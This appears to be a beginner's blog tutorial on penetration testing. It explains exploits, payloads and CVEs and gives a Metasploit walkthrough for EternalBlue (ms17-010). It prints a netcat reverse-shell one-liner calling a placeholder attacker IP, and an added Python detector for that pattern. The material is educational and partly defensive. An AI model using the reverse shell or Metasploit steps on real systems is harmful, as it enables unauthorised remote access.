In this article I will cover the basics of exploits and payloads, and the difference between the two. You will likely need to find exploits and use payloads as a fundamental part of every penetration test.
I am making these articles to keep myself motivated to learn cyber security, and to share my journey. 🙂 Join me in learning cyber security. I will try to explain concepts as I go.
Introduction to exploits and payloads
Some beginners are confused about the difference between exploits and payloads. In fact, they serve two very distinct functions in the exploitation process. Without an exploit there is no way to get your payload over, and without a payload you will not be able to get a shell.
Exploits
An exploit is a piece of code designed to take advantage of a vulnerability in a computer system. Since this definition covers every sort of system, every exploit will look different. These vulnerabilities are often found in real-world systems, since IT administrators often forget or lack the resources to keep their system completely up to date. There might also be vulnerabilities out there that have not been found!
Types of exploits
There are many types of exploits, such as:
- Buffer Overflow Exploits
- SQL Injection Exploits
- Cross-Site Scripting (XSS) Exploits
- Cross-Site Request Forgery (CSRF) Exploits
- Privilege Escalation Exploits
- Denial of Service (DoS) Exploits
- Phishing Exploits
- Zero-Day Exploits
- File Inclusion Exploits
- Malware and Trojan Exploits
Once again, the specifics are not important for now, but it is important to remember that exploits abuse a vulnerability, and these can be of a great variety.
CVE
One last piece of theory to cover is the definition of CVE. A CVE (Common Vulnerabilities and Exposures) refers to a specific instance of an attack or piece of code that takes advantage of a known vulnerability that has been assigned a CVE identifier.
This CVE gets assigned by a central authority, such as MITRE, after a researcher or other actor identifies a vulnerability. Once the vulnerability is known and an exploit exists, the responsible vendor or organization typically works to develop and release a patch or security update that fixes the vulnerability.
Once we start looking for exploits, we will often come across these CVEs!
Finding exploits
You generally find exploits by mapping the target’s network, for example by using nmap. This will hopefully give you a detailed overview of the target’s hosts and services, and their versions. Following this, you can search for exploits either by googling, using Metasploit (using the search command) or using a site such as https://www.exploit-db.com. All these exploits on exploit-db will have a CVE number assigned.
After finding an exploit you can then create your own script to exploit the system or find someone else’s script (again from exploit-db.com).
A famous exploit is called EternalBlue, which exploits a vulnerability in SMB services:
https://www.exploit-db.com/exploits/42315
In many cases these are Python scripts, and often you have to edit some port or IP address for the exploit to work. Luckily these exploits are often well documented.
A different option is using Metasploit for running your exploits and getting your payloads into the target system. We will not go into details, but I will cover a Metasploit example in a bit. First we should cover what payloads are.
Payloads
While exploits take advantage of a flaw in a system, payloads are the pieces of code that you send over once you have exploited it. A basic example of a payload is a piece of code that establishes a reverse shell to the target system. In a basic form this could look like this:
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <Attacker ip> <Attacker listener port> > /tmp/
This requires you have a listener running on your system. A basic listener can be established by running:
nc -lvnp <port>
As soon as the payload is triggered you will get a reverse shell.
It is important to understand that payloads we use to get a shell on a system will largely be determined by what OS, shell interpreter languages, and even programming languages are present on the target.
While some payloads are one-liners deployed manually, like the one shown above, others are generated using automated attack frameworks such as Metasploit.
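Seen from the defender's side, the FIFO one-liner above leaves a recognisable trail in process telemetry: mkfifo, an interactive shell and an outbound netcat client all started by the same parent process. The detection logic below is an added example, not part of the original article; the event tuples, host names, addresses and the grouping by (host, parent pid) are assumptions made for illustration.

```python
import re
from collections import defaultdict
from itertools import takewhile

# Constructed exec events (host, parent pid, command line), shaped like
# auditd/EDR process telemetry. IPs are from the documentation range.
SAMPLE_EVENTS = [
    ("web01", 900, "mkfifo /tmp/f"),
    ("web01", 900, "/bin/bash -i"),
    ("web01", 900, "nc 192.0.2.10 4444"),
    ("web02", 311, "sh -c rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f"
                   " | /bin/sh -i 2>&1 | nc 192.0.2.10 4444"),
    ("db01", 120, "mkfifo /var/run/app.pipe"),   # FIFO alone: benign
    ("db01", 455, "nc -lvnp 9000"),              # listener, not a client
    ("ops01", 77, "bash -i"),                    # admin shell alone
    ("ops01", 78, "nc -z 192.0.2.20 443"),       # port check only
]
SHELLS = {"sh", "bash", "dash", "zsh"}
NETCATS = {"nc", "ncat", "netcat"}
REQUIRED = {"fifo", "interactive_shell", "outbound_netcat"}

def indicators(cmdline):
    """Return which reverse-shell building blocks one command line contains."""
    found = set()
    # Unwrap a leading `sh -c`, drop quotes; tokens below stop at a redirection.
    cmdline = re.sub(r"^\s*(?:\S*/)?(?:ba|da|z)?sh\s+-c\s+|['\"]", "", cmdline)
    for segment in re.split(r"[;|]", cmdline):
        tokens = list(takewhile(lambda t: not re.search("[<>]", t), segment.split()))
        if not tokens:
            continue
        prog = tokens[0].rsplit("/", 1)[-1]
        flags = "".join(t[1:] for t in tokens[1:] if re.match(r"-[^-]", t))
        args = [t for t in tokens[1:] if not t.startswith("-")]
        if prog == "mkfifo":
            found.add("fifo")
        elif prog in SHELLS and "i" in flags:
            found.add("interactive_shell")
        elif (prog in NETCATS and not set("lz") & set(flags)
              and len(args) >= 2 and args[-1].isdigit()):
            found.add("outbound_netcat")
    return found

def detect(events):
    """Flag (host, parent pid) groups in which all three blocks were executed."""
    seen = defaultdict(set)
    for host, ppid, cmdline in events:
        seen[(host, ppid)] |= indicators(cmdline)
    return sorted(key for key, found in seen.items() if REQUIRED <= found)

print(detect(SAMPLE_EVENTS))
```

Requiring all three building blocks under one parent keeps a lone admin shell, a standalone FIFO or a netcat port check from raising an alert on its own.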
Automating payloads with Metasploit
This article won’t cover Metasploit in detail, but it is definitely the easiest way for a beginner to use exploits and payloads. The general procedure is as follows:
You search for an exploit by using the search command like so:
search ms17-010
Then you select the exploit by using use <exploit id>. After that, you list the required options (show options) and set them.
Parameters you will often use are:
- RHOSTS: “Remote host”, the IP address of the target system. A single IP address or a network range can be set. You can also use a file where targets are listed, one target per line using file:/path/of/the/target_file.txt.
- RPORT: “Remote port”, the port on the target system the vulnerable application is running on.
- LHOST: “Localhost”, the attacking machine (your AttackBox or Kali Linux) IP address.
- LPORT: “Local port”, the port you will use for the reverse shell to connect back to. This is a port on your attacking machine.
You can set these by running set <parameter name> <value>.
Once you’ve set the exploit options, you can choose the payload you want to use. There are two different types of payloads in Metasploit:
- Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
- Staged: Staged payloads will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small, making these payloads less likely to be discovered.
Use the show payloads command to list available payloads for the selected exploit module. You might want to know if a payload is staged or single. If we look at windows/shell/reverse_tcp and windows/shell_reverse_tcp, the forward slash between shell and reverse_tcp indicates that it is a “staged” payload, while the underscore means it is “single”.
Once you have found one you like you can use the set payload command followed by the name of the payload you want to use.
set payload windows/meterpreter/reverse_tcp
When you are done setting up you can run the exploit.
Once a vulnerability has been successfully exploited, a session will be created. This is the communication channel established between the target system and Metasploit. Now you are ready to escalate your privileges.
Anyway, this was enough Metasploit for now. I will make a future article on Metasploit itself!
It is important to note that it is also possible to create your own payloads with MSFvenom, which is part of the Metasploit framework. MSFvenom is great if we do not have direct network access to the target, and we need to deliver a payload, for example through mail. MSFvenom simply creates a payload file which you can use afterwards, but does not provide any of the other exploitation automation options like Metasploit.
Conclusion
In this article we covered exploits and payloads and their meaning:
1. Exploits:
- An exploit is a piece of code or a technique that takes advantage of a vulnerability or weakness in a computer system or software application.
- Its primary purpose is to gain unauthorised access, control, or compromise the targeted system.
2. Payload:
- A payload, on the other hand, is the malicious code or action that an attacker delivers to a compromised system after successfully exploiting a vulnerability.
- The payload can vary widely in its purpose, from stealing data to creating a backdoor for future access or even causing system damage.
3. Metasploit
- Metasploit is a framework which we can use to automate running exploits and payloads and to gain access to a system. While Metasploit is great for beginners, try not to become too dependent on it, since it is advisable to learn how everything works without this amazing framework.
I hope this makes sense. Otherwise, let me know in the comments!